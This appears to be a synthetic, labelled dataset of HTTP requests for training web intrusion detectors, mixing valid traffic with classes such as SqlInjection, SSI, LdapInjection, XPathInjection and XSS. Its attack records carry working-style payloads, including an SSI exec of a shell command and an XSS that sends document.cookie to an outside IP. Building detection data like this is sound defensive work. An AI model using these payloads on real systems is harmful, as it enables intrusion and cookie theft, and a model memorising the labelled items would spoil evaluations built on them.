Via: 4.1 www.bNrcgw.shtml, HTTP/8.8 www.xdT6.png
Transfer-Encoding: compress
Upgrade: sN4t/6.5, s0a4nt/7.1, jwcE/8.5, nssIdb/7.3
Warning: 372 www.oaA0r.jpg "dhymcjioS1jsehei" 
X-Forwarded-For: 167.200.160.22
X-Serial-Number: 95729667
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vt=718180&jy6eRtmibfbapX=3caaooeidis0a2isiip-oU&os=y9e]t$poht&aFdjPOir=aHOMhk_U-p4n&ujcynsDuekmab=cZ6&t9hbtsMdasltoc=dsdaeRes

End - Id: 7019
Start - Id: 25268
class: Valid
GET /nqTehOU.jsp?sditm4EMe=25&I98e8h=68v98scriptr2&ustwbeRi=c+&slgnpii9nhrit=nwarnjns7n&jlocationSpMzl7C=ooeossi&include8RypXMgR@s=d%40olCbs&asesiofeuiOtHt0=o41ee1tfy2+a&astngteyo=eH26Kap5e&ioh=yl&4erjthlZpa=3-aoiii_k0LV HTTP/1.1
Host: 194.192.45.235
Connection: eea1
Accept: video/*, video/mpeg;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 142.23.146.55
Cookie: c5Stae4rsat=ntie;iO=53;hy6hselaiz=35534;havingXBFB=57;nm=967753;roEi=386328
Cookie2: $Version="33"
Date: Thu, 10 Dec 09 10:57:30 CET
ETag: W/"6ritmTsIlhNxBiznf"
Expect: 100-continue
From: lwwnasp@eesn.biz
If-Modified-Since: Fri, 27 May 05 17:47:40 CET
If-Unmodified-Since: Thu, 13 Jan 05 11:32:54 CET
If-Match: "_8@4Eg36ZEsXTrC_v8mk"
If-None-Match: *
If-Range: *
Max-Forwards: 687
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic b3MzOWhBbjpQdXJhc24=
Authorization: Digest opaque="gseern"
Range: 04-39299,179937-1471,76-
Referer: http://nntcqdne.st/irela/fmeahio/lkcBs/rur0f/utpert.exe
TE: gzip,trailers
Trailer: Trailer
User-Agent: Mozilla/3.4 (Windows; U; WinNT 9.2; iE-bo; rv:5.5.3) Gecko/53150924
UA-CPU: x86
UA-Disp: 8204,1865,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4028x8502
Via: h6s/0.9 18.80.62.142, 4.8 www.sak7tnk.png, 3.1 www.aiAcni.html
Transfer-Encoding: deflate
Upgrade: smn6/9.9, tqura/5.8, omdo/1.2, eil2/4.6
Warning: 741 4.215.113.72 "rtadv" "Sun, 22 Aug 04 14:34:46 UTC"
X-Forwarded-For: 249.207.205.242
X-Serial-Number: 139373036597408522
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25268
Start - Id: 22150
class: Valid
GET /copy@Q.kjinclude0vOHY/aoqsaweR8uU/en3m5/_uRKj-hRz/pezEeaes5oa9act/aqz/nzJ7Y9hjd/tsnPh0shhamshh8z/6asinEnfmditBf2iw/pd68ancl9e7q/gwl.css?e5laNinbov=7022121 HTTP/1.1
Host: 155.224.90.188
Connection: keep-alive
Accept: image/png;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: r-e;q=0.6, Ct-eoUAoIs;q=0.2
Cache-Control: no-cache
Client-ip: 75.214.220.82
Cookie: 3aflsi0ft2hd=tAsbmnldoleilq4ee;IhfZPDfP=heursc;NO7efoNa=rcwechob;formcoptUBV=mYiionzea7es2t;6chsN=445454
Cookie2: $Version="7"
Date: Tue, 21 Jul 09 04:32:17 UTC
ETag: W/"x0nw.1q1-Yd0rJb7-HAp"
Expect: 0eOsst=prnHif81;eunueed
From: aRiniz@oyso0ono.st
If-Modified-Since: Sat, 22 Jan 05 11:08:10 GMT
If-Unmodified-Since: Fri, 10 Nov 06 03:38:11 GMT
If-Match: "7pJMTPzgIBVvi5ku"
If-None-Match: *
If-Range: *
Max-Forwards: 99
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.cneeo.de/urssresh.exe
Authorization: NTLM WjNmMkU1U3NjYWl3cGFoSGltdDVhamlFZGhhZXA3OXJ0b2lyZW5zZGZyaXVuNG9z
Range: 832-,13-,-90
Referer: http://www.trlNh.cz/arrft/ensm/Fuxgto/g1ijfea.jpg
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: 2JMusehiEI/1.4.2.6.4
UA-CPU: x86
UA-Disp: 0825,2086,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 829x0531
Via: HTTP/6.8 89.116.113.122, FTP/1.3 www.japt.tiff
Transfer-Encoding: deflate
Upgrade: 1icdej/9.5, un4b/5.8, cnai/1.3, seto/7.7, rlnriy/9.7
Warning: 917 www.soeSgapr.css "c5leeikhcoalpeot4" 
X-Forwarded-For: 164.137.229.85
X-Serial-Number: 89307518698
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22150
Start - Id: 31271
class: Valid
GET /oeDbmxteep/5Zvh/yaobopetraPdlsiaiia/oogaene4Dt7nta17itaP/l-bp11/3idexeaet3e1sic/nignld/eeNfwnst4omaaiote/gfSe.mdb?Ssezleqe=7doahjOscriptbipa HTTP/1.0
Host: 164.255.49.128:60
Connection: close
Accept: audio/x-wav
Accept-Charset: cp-950, x-mac-japanese;q=0.7
Accept-Encoding: 
Accept-Language: ia5Ed-j2lh;q=0.8, nnssih-llH;q=0.9, eewig-e4ayDhe;q=0.6, 8sba-de0;q=0.8, eGoorh-jclworbt;q=0.1
Cache-Control: no-store
Client-ip: 200.93.24.149
Cookie: cs35etz=6;pldcC=R0
Cookie2: $Version="0"
Date: Wed, 28 Jan 09 06:26:19 UTC
ETag: W/"6QGkVgbPM@bx-ExsL"
Expect: qddeh=sdiabmt;loHserrr
From: nio77o3@cuat.be
If-Modified-Since: Mon, 20 Dec 04 06:37:44 CET
If-Unmodified-Since: Fri, 25 Jan 08 16:26:56 GMT
If-Match: *
If-None-Match: "zaY0Tpaf0g7pSmM"
If-Range: Thu, 02 Aug 07 19:14:11 UTC
Max-Forwards: 4639
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: NTLM ZWhycnZ0SWxrckk3cGFqbnd0bnNpZTB0NWZzb25vZWE1dGlvcTFGS2xvaWQ=
Range: 019-,893-4434
Referer: http://bTeiln.be/Pqwf/wrrtndrN/dpgoxRe/0s0n.php3
TE: gzip,gzip;q=0.3
Trailer: Date
User-Agent: ul9IEeOsei/9.5
UA-CPU: 68000
UA-Disp: 097,2984,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3795x126
Via: Tmhl/9.7 98.204.196.120
Transfer-Encoding: compress
Upgrade: vn4e/1.5, o4t/2.0, qsr1e/6.0, tmD/0.8
Warning: 921 www.attyo.css "A2wrdsvtr6sQouiiualn" 
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 173088240
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31271
Start - Id: 29309
class: Valid
GET /d2uyg58jF06iJDz/oeMnull/nnrqcsi2/ocmdOincludef7/tkZL2N7wW/iturRxTyNwbdie2j/0KL/a3eb9DupdatesSbSzWDW/ouanukyntnieptaaei/oh.php3? HTTP/1.0
Host: 125.75.246.144
Connection: 5tOncI
Accept: video/*;q=0.6, image/png
Accept-Charset: iso-8859-7, iso-8859-15
Accept-Encoding: *;q=0.8
Accept-Language: itbhdYei-a, ka2gha-rafhsu;q=0.8, Iiu-45ow;q=0.4
Cache-Control: no-store
Client-ip: 189.125.66.35
Cookie: 0ltdiesseYpOtd=enc1eformajem<noa?jne
Cookie2: $Version="018"
Date: Sat, 16 Apr 05 01:45:47 GMT
ETag: W/"ykBKz8OIhj28Pvu"
Expect: 3wa2sr=tQnp
From: yttt5iy@rcto.com
If-Modified-Since: Mon, 22 Mar 10 20:01:27 CET
If-Unmodified-Since: Fri, 20 Aug 04 22:32:56 UTC
If-Match: *
If-None-Match: *
If-Range: "PPSeRbc2j7eS0kvYeb"
Max-Forwards: 94
MIME-Version: 0.7
Pragma: Rha=3zr
Proxy-Authorization: NTLM dGFnd3VoaXVsM2ZuSWFkZFNpbXNoY2ZhdWU4dHJhc21yaHM=
Authorization: Basic bTlpajp0cm10
Range: -1680
Referer: /7thb/ei9dBgr/s7pmOcnw.cfm
TE: trailers,chunked;q=0.3,trailers
Trailer: Referer
User-Agent: Mozilla/3.3 (Machintosh; U; PPC 8.8; dt-ni; rv:7.3.7) Gecko/16127326
UA-CPU: StrongARM
UA-Disp: 640,917,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8762x9260
Via: 7.5 www.hhvm5roe.png, 2.5 202.153.84.76:51084, 7.8 2.32.182.232:858
Transfer-Encoding: deflate
Upgrade: n1tlH/0.1, Iwotm/0.8, 4mr/3.8, entnl/4.8
Warning: 708 www.opmsnet.html "atmareba0" "Wed, 30 May 07 20:29:06 CET"
X-Forwarded-For: 63.57.100.153
X-Serial-Number: 892680378227754
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29309
Start - Id: 7589
class: Valid
PUT /iEChtXUGZulXEk45OHif.jpeg? HTTP/1.0
Content-Length: 188
Content-Language: ebmeGm
Content-Encoding: gzip
Content-Location: http://eeketd.de/cymtE/iashsn1c/tlrfy/rd8ily.swf
Content-MD5: YU1paWxidWxkaWF1OGRvSQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Jul 04 07:32:16 UTC
Last-Modified: Sat, 13 Dec 08 12:15:06 UTC
Host: www.rEtat.com
Connection: close
Accept: video/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: hy57teg=Hvp
Client-ip: 202.177.178.10
Cookie: ianltteso=e;O0tmorq8?blN;tsothsrn=n1RhdoEtsiedy;zyahcsbhsr=u/e+s(qbody/swdboot.inihA;03b=oyrgf4e6
Cookie2: $Version="58"
Date: Sun, 28 Mar 04 09:57:58 UTC
ETag: W/"HuHuIb_fESghn.N"
Expect: uohn=cmnystid
From: 0ke0@2ergsrmep.it
If-Modified-Since: Fri, 23 May 08 08:08:36 CET
If-Unmodified-Since: Wed, 18 Feb 04 10:35:33 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 09 Oct 05 02:11:56 CET
Max-Forwards: 496
MIME-Version: 3.3
Pragma: z=wvu
Proxy-Authorization: Basic ZGl0NWRuZTpkaXNhZnRzaQ==
Authorization: Digest realm
Range: -984
Referer: /ndtn/ef8itb/pbtwdh/bsznr/spfpbo.php4
TE: trailers
Trailer: Authorization
User-Agent: nX3yOaCX http://www.rsoashi.st
UA-CPU: Sparc
UA-Disp: 504,612,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 449x1634
Via: HTTP/9.0 43.152.133.84, n26N/8.9 www.mo2ees.jpg, 9.1 146.154.180.152
Transfer-Encoding: deflate
Upgrade: Trcl/0.4, Iktrb/8.6, ydcebx/8.7, rfe/6.1
Warning: 990 www.kpmht.gif "roigoeiiehg" 
X-Forwarded-For: 43.133.9.20
X-Serial-Number: 426343709
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~

oltcsdaha9Se=+h&Ce4tCwMaC-evalF=72693293&9z5fng9=rZRTP&iA6yboad=800141&hkibnudcri1niai=O7&hjcAOkEC= e6nopena?Sra'%)k?&Ey=m1 4iEirz&yxDme1nDed=56850993&3yr5K=jzha2gU&sCIoPt6=aps

End - Id: 7589
Start - Id: 33378
class: Valid
POST /9mbmhthttp/G5PIFR7T/omoe0/6-fKutXHn@.LDawSW8cY/-MlR/dhmM_Cxdoh5gYFX6dYeN/oS20_93VFxdqJ/hn8re/evdn0uiltrsb9bmsr.php? HTTP/1.1
Content-Length: 39
Content-Language: a,ra
Content-Encoding: compress
Content-Location: /ykda/a1R3iwi.dll
Content-MD5: aWRvYXJFZW1yTG9odHJlcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 17 Mar 10 20:49:17 CET
Last-Modified: Mon, 27 Nov 06 15:12:32 UTC
Host: 203.58.112.110:26
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: koi8;q=0.6, iso-8859-9, euc-kr
Accept-Encoding: *;q=0.4
Accept-Language: s5ed-ti;q=0.3, v-esxilf;q=0.8, fns-rrqEet
Cache-Control: pe='leaeou'
Client-ip: 86.188.58.100
Cookie: iZPr=cN2hnh1B;tlycia0dnetqpm=mOyUW
Cookie2: $Version="14"
Date: Sun, 13 Apr 08 08:46:21 CET
ETag: W/"rK1_UL8kFuqq0Ietm"
Expect: dFxo=ihceie7
From: 3ton@bihnHawNg.be
If-Modified-Since: Mon, 25 Oct 04 24:14:49 CET
If-Unmodified-Since: Wed, 11 Oct 06 15:17:01 UTC
If-Match: *
If-None-Match: "rLxAgrYU4XJeKme2y"
If-Range: Sat, 10 Apr 04 17:15:38 UTC
Max-Forwards: 053
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic ZWlnck1oZXQ6eXNVbnZyZQ==
Authorization: NTLM c3J0ZmVzdG5odHdldHJtOHZzakJwNWVpZmVuaHRmbHV0bzJiaQ==
Range: -0803,937-
Referer: http://www.htz7egwa.gov/fken6at/4sThp7p/rnii.tiff
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.3 (X11; U; Linux i386 2.3; sD-hk; rv:7.3.4) Gecko/13013230
UA-CPU: 68000
UA-Disp: 987,602,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3714x6076
Via: 2.2 www.aryEOsUc.htm, 7.9 www.nnnsa.jpeg, 6.8 www.h1uheS.js:2
Transfer-Encoding: 5lhnnr
Upgrade: hix3/8.0, Imde/9.7, cyao/6.6, etnO8n/7.1
Warning: 083 www.fspp3om.jpeg "iC94etihocgcee3e" 
X-Forwarded-For: 113.32.119.185
X-Serial-Number: 93235551323019151899
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

edeeosi8coeL=rg-wc&wzBP4KfREO@U=ehrPGrs

End - Id: 33378
Start - Id: 12458
class: Valid
GET /nGnig0bMR.cgi?Sguthseets=385&laaez=tr&hhrashoasu=1003827&rsyddrtxraws=617&uy6wt=elhd%2Bgroup+bybinm9u%5B&hvsnEooo=rreplace9oBautoexece+tl&_autoexecIk.=38768&irtioUSnezle=710282&oB=edPFB_T8KW3&xwyiDF1aB2a=767127905&ltsiAcz1nrjhoos=odocumenttrzeo%3ArlotboEwaC&pp8n3ems=69&diepo=379&Nlmlen0irIsz1=eqaoRee&IEkRMqbiz=7092 HTTP/1.0
Host: 58.105.220.30
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=52511
Client-ip: 192.209.86.95
Cookie: hsh6iojnts0n=eni@ab~r;s7ys=34
Cookie2: $Version="0"
Date: Sat, 27 Oct 07 09:44:32 CET
ETag: W/"C-voaqyhpCXRr0@YhE"
Expect: eoaA3tio=as6onmf;mi3td5g1=eeT7
From: eoirpN@eichoAt.biz
If-Modified-Since: Wed, 11 Jun 08 10:41:05 GMT
If-Unmodified-Since: Tue, 21 Apr 09 05:36:51 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Jan 08 24:20:50 GMT
Max-Forwards: 0
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest qop=ttetoa
Authorization: Basic bmhvQXU6aU5zSWk=
Range: 6241-,640-8134,1990-
Referer: http://two4.be/ojlsco.tiff
TE: chunked,trailers,trailers
Trailer: Range
User-Agent: aF9.l3x6e http://www.ee7mc.biz
UA-CPU: PowerPC
UA-Disp: 433,005,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 357x295
Via: 1.6 www.meeet.tiff:4, FTP/5.7 www.aceswo6.htm
Transfer-Encoding: identity
Upgrade: aira/7.5, weeA2/3.6, ef9pg6/4.1, ee3/8.2, OwBuO/8.6
Warning: 342 www.7riin7e.css "bswei9il" "Fri, 24 Jun 05 02:30:17 GMT"
X-Forwarded-For: 238.20.116.20
X-Serial-Number: 31499732572792
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12458
Start - Id: 45146
class: PathTransversal
GET /./? HTTP/1.0
Host: 24.4.203.200
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936, iso-8859-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 117.16.100.183
Cookie: atetat=gihqy;c7eitysslr5=55;thdrxeqietarz=95;reanlli5=7lq9:a;eeeaerh7uE=8l|a;QehtaccesciWqxY=sdrgciy
Cookie2: $Version="1"
Date: Sat, 09 Feb 08 01:03:25 CET
ETag: "0wSFCQ37o04lOpEZWe"
Expect: sIseObpe
From: swItt@yOenslihWe.de
If-Modified-Since: Thu, 09 Mar 06 06:29:40 CET
If-Unmodified-Since: Wed, 30 Aug 06 11:54:22 UTC
If-Match: "wYDgoW2IEMcFWQ5Yn"
If-None-Match: "eW9hicL@KKPn5hP"
If-Range: "0gcNNxmEKdNOKPe"
Max-Forwards: 871
Pragma: HhB='Teisth'
Proxy-Authorization: Basic b2U1UnFvOnlOZWVyc2E=
Authorization: Basic M2VuZWx3NDpFYWtIaQ==
Referer: http://www.olIE.org/dhnecfDd/6szvpw.cfm
TE: trailers,trailers
Trailer: Host
User-Agent: otOkaiunn (eIPDnQ; l-QsD494W; lUZu@@6; uUpkUyGT)
Via: HTTP/3.4 www.udeee.js, 3.0 www.eartphlt.html:68511
Upgrade: rihnni/3.3, qrt5E/4.2, tei5h/7.5, aev/2.9
X-Forwarded-For: 189.98.19.155
----: ----------------------------

null

End - Id: 45146
Start - Id: 41871
class: SqlInjection
GET /1u83/d-9v.jKCrs/ABLrYqXS/2jiJObnFM/7a7ttcaCFsiO2ado5dmh/e0pqewo/sx.E/jpeF/cm1eein4yerrgspbvn.bin?dera0oe=eh&positionNGQ=yait&PF@xZp.hW=det5&rr4ittr=++++OR++++2+%3E+++1&LWziL=pnnntddych4knd&ht9ha=psSmtr%40wheredag0+&ndpiojheooy=%29d&TCacceptcGt=fn3b9rSepnnt3sne&t9=8o HTTP/1.1
Host: 227.179.34.163
Connection: lm1d
Accept: */*
Accept-Charset: windows-1257;q=0.1, euc-cn;q=0.7, gb2312, utf-8, x-mac-icelandic;q=0.9
Accept-Encoding: compress, gzip;q=0.8, identity, deflate;q=0.2, identity;q=0.4
Accept-Language: samjci-ou, ojpenme-cE2ahb2o, 6dathon-sho, es38-As
Cache-Control: no-transform
Client-ip: 43.178.27.154
Cookie: rsyoasinsmnaa4=b
Cookie2: $Version="776"
Date: Fri, 24 Apr 09 13:16:50 UTC
ETag: W/"NB8ujNmt0uyX._sVfglF"
Expect: estmtade=iia9d
From: uims2c@rtXh1sbi2a.cz
If-Modified-Since: Mon, 29 Oct 07 15:20:03 CET
If-Unmodified-Since: Sun, 29 Jun 08 08:27:53 GMT
If-Match: "GMuowqvypQhG0xaOlag8"
If-None-Match: *
If-Range: Fri, 08 Jun 07 06:59:16 CET
Max-Forwards: 739
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: hruhs OR2omeK=eaefp
Authorization: cerhke srest=lwcshsc
Range: 2764-93323,17883-91
Referer: http://2r7Qeu9t.de/d382.sh
TE: trailers,deflate;q=0.3,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.5 (X11; U; Linux i586 8.7; dc-hc; rv:5.3.6) Gecko/48123690
UA-CPU: PowerPC
UA-Disp: 0650,9249,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 698x973
Via: etroo/3.6 www.coao.css:6
Transfer-Encoding: sfmai
Upgrade: prc/4.5, 2sFe/0.3
Warning: 392 113.130.15.37 "8vRtmnhtkaGbbhnilg" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 8017409
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41871
Start - Id: 40082
class: SSI
GET /yjkB/oAe1sBp2/sA7GACjbpj/mVWFQH/rN/kAeooeiyuThaiupa/luNwyOae/ictnC._3eW9T7F_-zEv/e2qtDw_YvZ/ovia@fQPT_cPpRZ.htm?zepossnh=539117&eitt=38&uatOet3dohvm=%3C%21--++%23exec+++cmd%3D%22%2Fbin%2Fls+++-l+%2Fhome%2Feraqo3e%2Faoyhl9tvrT%22+--%3E HTTP/1.0
Host: www.cCTsSxE.uk
Connection: on6f
Accept: audio/basic, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 53.190.46.19
Cookie: higelie=ceO
Cookie2: $Version="080"
Date: Sat, 02 Feb 08 21:57:31 GMT
ETag: "zpw2OwFuO-yaWgtlF9eB"
Expect: 0ugtrh
From: hbdwf2hh@oEzag3e7.de
If-Modified-Since: Sun, 23 Aug 09 23:08:47 GMT
If-Unmodified-Since: Tue, 21 Oct 08 01:50:14 UTC
If-Match: "Cc@XhyY16axHw2-0"
If-None-Match: "SVYAoxW5d9NmkPUp"
If-Range: Mon, 09 Mar 09 18:51:34 GMT
Max-Forwards: 0739
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: mshe trCer=de1seo
Authorization: NTLM c29kZ2NpaXNhOWVuYmVvcmVpczZ0QmFTc29pcmkxZm9zZXRhdg==
Range: -170
Referer: /hasIsien.js
TE: chunked,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.8 (compatible; Tovdalh; SunOS sun4u; ouhTdje4fT)
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0944x596
Via: HTTP/9.3 249.51.212.194, FTP/5.4 www.hf3oyro.html
Transfer-Encoding: Redce
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 187 www.s2nfht.shtml "Idhcekl" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 9018401167222078
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40082
Start - Id: 38552
class: LdapInjection
GET /qtnqxhtot3ssMl/1Yru_1vv30mail6/fseeop/dS2wYk/4dQIMx9mjSoptpXl.tiff?19bsa=aCq%29%28+++%7C++%28Oh6%3D*%29&toro=tyn6&sxoeBick=hxe HTTP/1.0
Host: www.ooiuotsAEh.cz
Connection: close
Accept: text/html, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a-b;q=0.5, he-rsi2dhI;q=0.5
Cache-Control: max-age=092
Client-ip: 79.72.69.82
Cookie: LiRmckNfromz=59723972;seeoiaod8eio=60;nMat=21
Cookie2: $Version="4"
Date: Mon, 31 Jul 06 02:54:57 GMT
ETag: W/"Mx20H@ckCBRko3Mhzz"
Expect: elny
From: zttnih@4elXnnltkb.org
If-Modified-Since: Wed, 28 Feb 07 13:13:47 UTC
If-Unmodified-Since: Thu, 19 Jun 08 15:18:15 CET
If-Match: "6997.bBrvC@pu8C@"
If-None-Match: *
If-Range: Sun, 10 Jan 10 22:54:29 GMT
Max-Forwards: 5
MIME-Version: 2.4
Pragma: nbt='seerEq'
Proxy-Authorization: ohceo eebrth=greetthm
Authorization: Digest nc=3f33937E
Range: 0-592893,7-227,398-
Referer: http://www.wd51lVl.com/tSaes3dC/doso/Dnss/rdeeanem.jpg
TE: gzip
Trailer: Transfer-Encoding
User-Agent: RvThr/4.3
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: FTP/7.7 214.79.91.147:08, 5.5 111.136.221.205
Transfer-Encoding: identity
Upgrade: rllabd/5.8, enih/7.5, Etsi/1.4, iwr/2.8
Warning: 257 www.nege.css "tabeoWaOoehrErrknae" "Fri, 05 Jun 09 24:03:11 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38552
Start - Id: 48919
class: XPathInjection
GET /1tY4i/imgrNB0IShAfP/Haihtbrokll6RHd/e3TDUbcvPxdbQNf/exzDoH/aiIAd/smfnl4tssfptea/3sosd/bDI/5ruRlcejac/5Ehhk-F/3.65rH8EfJV.Rk8.asp?asenamdefrrefTl=18&BWNqopen2.IiZ=445076&j650Ohaving61Jq6=+f&soAehmns5cn=crojlhsjnohSre8r5H&rfenE80wtt5rt=%28i++%3C++count%2813Fhe%2Fchild%3A%3Atext%28%29%29+++and++++j++++%3C++count%28sbe%2Fchild%3A%3Acomment%28%29%29+++++and+++++k+++%3C++++count%28tm%2Fchild%3A%3A*%29+%29&dkh43pa=apcy HTTP/1.0
Host: 219.105.202.32
Connection: close
Accept: application/*;q=0.9, video/*;q=0.3, video/*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=6433
Client-ip: 33.184.179.137
Cookie: oslis4er6=elsmailu>Am;ymiol2IhiEei=42;lqOrnuhyln=na;hRwget6t1pAmy=m6OLziFNB;hh2ektuvn4otp0o=@eMEhtoppmo0
Cookie2: $Version="504"
Date: Sat, 29 Aug 09 05:08:03 GMT
ETag: W/"cAe5kf1_9HIkvNMxj_FA"
Expect: 100-continue
From: adatne4h@font.be
If-Modified-Since: Mon, 07 Nov 05 21:19:02 CET
If-Unmodified-Since: Mon, 17 Nov 08 12:39:03 UTC
If-Match: "JY5ax02BTUC8TGhj"
If-None-Match: *
If-Range: *
Max-Forwards: 2362
MIME-Version: 7.0
Pragma: yne='WRfn'
Proxy-Authorization: Digest response="f4fa2C3be9dCA3EBbB36Ea92bAdd9Da1"
Authorization: NTLM M29zdGpFbm1TeW9zWnN6cmJpZ2JkbnJwZXR1dHRpYXRzZG5TRzdzVGg=
Range: 1264-
Referer: /ahyui/tahl/tTtc/qcat4/iUoimzTs.css
TE: gzip;q=0.7,trailers,gzip;q=0.4
Trailer: Warning
User-Agent: meir (o.oqKimA; d8KIcKu; rO8Y-.NG; aGpaHia; u5zWQt2g0e)
UA-CPU: PowerPC
UA-Disp: 9230,4281,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 508x349
Via: 7.8 www.dsrsom5.js:8, 0.0 www.cEwfnnr.htm, 1.7 229.46.126.177
Transfer-Encoding: identity
Upgrade: u3c/6.0, utaos/8.9, oeEa2/1.5, oda/3.6, aroeit/0.1
Warning: 099 www.eSitghtc.htm "2nttveexd" "Tue, 21 Sep 04 15:34:20 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 90589069814400492161
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48919
Start - Id: 48202
class: XSS
PUT /5dlsJdivzZM.d/8WG82Ln/neiaac/ahsdlioe6yiNe/aoX3xsh/isqaei75isdTreo3rTme/czrtignnzwnyluoHtdm/ni/wzWasHS8iD_Uw5bC./0dua7MsXiOFA@Ghgo.BG.cfm? HTTP/1.1
Content-Length: 72
Content-Language: s,4teeo,S3q56
Content-Encoding: identity
Content-Location: /dehml/hpriX.rar
Content-MD5: d3NoemFFcEFpYUF2ZGVhcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 07 Nov 04 24:47:01 GMT
Last-Modified: Sun, 23 Jan 05 21:03:31 GMT
Host: 85.33.15.213
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.9, deflate, compress
Accept-Language: eIlse-ammvtb2
Cache-Control: max-stale=90
Client-ip: 198.54.180.201
Cookie: oHswytEacae=0438806762;Va18ujxee=lermocharrfathept 7tmr ;jH3accept=r8rIceobshttp1s(r
Cookie2: $Version="058"
Date: Mon, 16 Jul 07 18:34:54 GMT
ETag: W/"Fl5QW29xoF4.serjG2sz"
Expect: 100-continue
From: nio6@slo8Cr.fr
If-Modified-Since: Wed, 14 Oct 09 09:28:31 CET
If-Unmodified-Since: Fri, 08 Jul 05 11:53:21 CET
If-Match: *
If-None-Match: "kEDcfSGTrOO11J.Mfy5A"
If-Range: "2n6g6_sqE@qnWZz"
Max-Forwards: 4
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest username="moie1"
Authorization: esrn ufpqoacm=ihsm21
Range: 86-
Referer: /8ecsi7iA/n8rEG/wtageAd/8otrc6s.fgf
TE: gzip;q=0.1,trailers,trailers
Trailer: If-Range
User-Agent: <a   href    =    "    javas&#99;ript&#35;[window.open('http://47.11.109.137/lisima.nsf'+document.cookie);] "    >
UA-CPU: PowerPC
UA-Disp: 9694,0941,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0833x5233
Via: oreae/6.7 54.116.230.141:19304, 1.4 0.2.125.126
Transfer-Encoding: deflate
Upgrade: nw3/1.2, Eccue/9.3, dnaeM/4.7, yeug/4.3
Warning: 376 www.tr4on.jpeg "m7aaREuTTovptbolar" 
X-Forwarded-For: 251.96.98.120
X-Serial-Number: 340888141293
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

it7o3sl1ir=imy0Lyh&hHRuC5=exin&wp-w4-KddxB@1=islnilw4SeshstI&W1Q7D1k=orm

End - Id: 48202
Start - Id: 1353
class: Valid
